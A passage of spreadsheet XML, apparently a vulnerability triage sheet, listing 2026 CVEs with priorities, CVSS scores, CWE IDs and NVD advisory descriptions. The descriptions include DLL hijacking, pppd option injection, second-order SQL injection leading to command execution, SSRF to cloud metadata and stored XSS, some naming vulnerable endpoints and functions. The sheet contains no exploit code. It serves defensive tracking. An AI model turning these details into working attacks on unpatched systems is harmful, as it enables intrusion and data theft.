      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86320</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92838</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>0df08a0e-a200-4957-9bb0-084f562506f9</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>A DLL hijacking
vulnerability exists in the GeoVision GV-Remote E-Map desktop
application. The application loads one or more dynamic-link libraries (DLLs)
from an unsafe search path, allowing a local attacker to place a malicious DLL
in a location searched before the legitimate library location. If
successfully exploited, an attacker with local write access to the affected
directory could achieve arbitrary code execution in the security context of
the GV-Remote E-Map process.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92838</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93337</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>NetworkManager-l2tp contains an improper input validation vulnerability that allows local users with VPN connection creation permissions to inject arbitrary pppd directives by supplying mru or mtu property values containing trailing non-numeric content after a valid integer. Attackers can exploit the verbatim write of unvalidated strings into the pppd options file via write_config_option() to inject the plugin directive, causing the privileged pppd process to load an attacker-controlled shared object and achieve arbitrary code execution as root.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93337</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48977</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-123, CWE-1284, CWE-823</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>OpenSlide is a C library for reading whole slide image files. From 3.4.1 until 4.0.1, OpenSlide's parse_level0_xml() processing in src/openslide-vendor-ventana.c accepts nonpositive row or column tile counts from a crafted Ventana BIF file. The invalid counts produce attacker-controlled relative memory offsets and allow arbitrary values to be written at those offsets, affecting all supported platforms and configurations and resulting in a crash or potential arbitrary code execution. This issue is fixed in version 4.0.1.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48977</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50158</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>yutu is an AI-powered toolkit for managing and growing YouTube channels. Prior to 0.10.9, the caption-download MCP tool accepts a caller-controlled file parameter through cmd/caption/download.go and passes it to Caption.Download() in pkg/caption/caption.go, where os.Create() creates or truncates that path without using the pkg.Root confinement boundary backed by YUTU_ROOT. A principal able to invoke caption-download, including a local HTTP client when the MCP server runs with its default authentication-disabled configuration, can write downloaded caption bytes to any path writable by the yutu process outside YUTU_ROOT. This can overwrite application files, configuration, shell startup files, logs, or data and can cause persistent code execution or denial of service depending on the selected writable target. Live caption retrieval also requires usable service credentials and an accessible caption identifier. This issue is fixed in version 0.10.9.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50158</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53557</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, an authenticated user can supply a crafted sheet["tableName"] value in the Excel datasource configuration submitted through POST /api/v1/datasource/, and SQLBot stores that value without safe identifier handling. When the same datasource is later removed through DELETE /api/v1/datasource/{id}, the stored value is interpolated into datasource cleanup SQL and executed by PostgreSQL. This second-order SQL injection can invoke PostgreSQL COPY TO PROGRAM and execute arbitrary operating-system commands with the privileges of the postgres process inside the SQLBot container. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53557</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54339</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>Glean is a self-hosted RSS reader and personal knowledge management tool. Prior to 0.2.6, POST /api/feeds/discover passes an attacker-supplied feed_url to discover_feed(feed_url), creates a subscription through FeedService.create_subscription(), and enqueues fetch_feed_task. The background path calls fetch_feed(feed.url) and parse_feed(), which assigns each RSS item link to ParsedEntry.url. The task then passes ParsedEntry.url to fetch_and_extract_fulltext(parsed_entry.url) without network-level validation in backend/packages/rss/glean_rss/extractor.py and backend/apps/worker/glean_worker/tasks/feed_fetcher.py. A malicious feed can therefore make the server request private, loopback, link-local, or cloud-metadata resources. The fetched response is stored in Entry.content and can be retrieved through GET /api/entries/{id}, producing non-blind server-side request forgery with full response disclosure. This can bypass network perimeters, probe internal services and ports, expose internal configuration or web content, and potentially disclose cloud metadata access tokens. This issue is fixed in version 0.2.6.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54339</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81546</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>61adb53e-e4b3-47f7-8a93-4717c9e77dc6</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>The Affinity by Canva application before 3.3.0 (September 2026 release) did not perform adequate bounds checking when parsing Affinity document files leading to a stack-based buffer overflow. A threat actor could craft a Affinity document that when opened by a user in Affinity could result in arbitrary code execution.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81546</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45726</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-732</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. From 1.3.0 until 1.6.6 and 1.7.3, importing a standalone Talos cluster creates an ImportedClusterSecrets resource containing the cluster's complete CA secrets bundle. The access rules in internal/backend/runtime/omni/state_access.go allow an authenticated user with the Reader role to retrieve the resource through ResourceService if the importing actor has not rotated those secrets, exposing Kubernetes, Talos, and etcd CA private keys plus the service-account key. The Kubernetes CA private key permits certificate signing for privileged identities such as system:masters and provides control of the imported cluster outside Omni's authorization boundary, including its workloads, credentials, and secrets. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45726</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54506</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-185, CWE-79</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.5, app/controller/user/profile.php accepts the user[bio] field and passes stored content through sanitizeHTML() in system/functions.php, whose on* event-handler regular expression omits the forward-slash delimiter and whose do-while condition compares the string to itself, so forbidden nested tags are removed only once. An Author-role or higher user can submit solidus-prefixed event-handler markup or nested forbidden tags that survive sanitization. The stored bio is rendered without sufficient output encoding on /author/{username}, in the admin user-management view, and potentially in comment displays, causing attacker-controlled JavaScript to execute when unauthenticated visitors, administrators, or other users view the content. This can expose browser-session data and permit victim-context account actions, defacement, or phishing. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54506</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66618</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WP Maps &lt;= 4.9.9 versions.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66618</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66619</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Newsletters &lt;= 4.18 versions.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66619</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66624</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WPMasterToolKit &lt;= 2.22.0 versions.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66624</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66625</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WC Vendors Marketplace &lt;= 2.7.2.1 versions.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66625</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66626</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>Editor SQL Injection in SKT Addons for Elementor &lt;= 4.0 versions.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66626</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66628</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>Shop manager SQL Injection in WP-Lister Lite for eBay &lt;= 3.8.11 versions.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66628</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66630</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
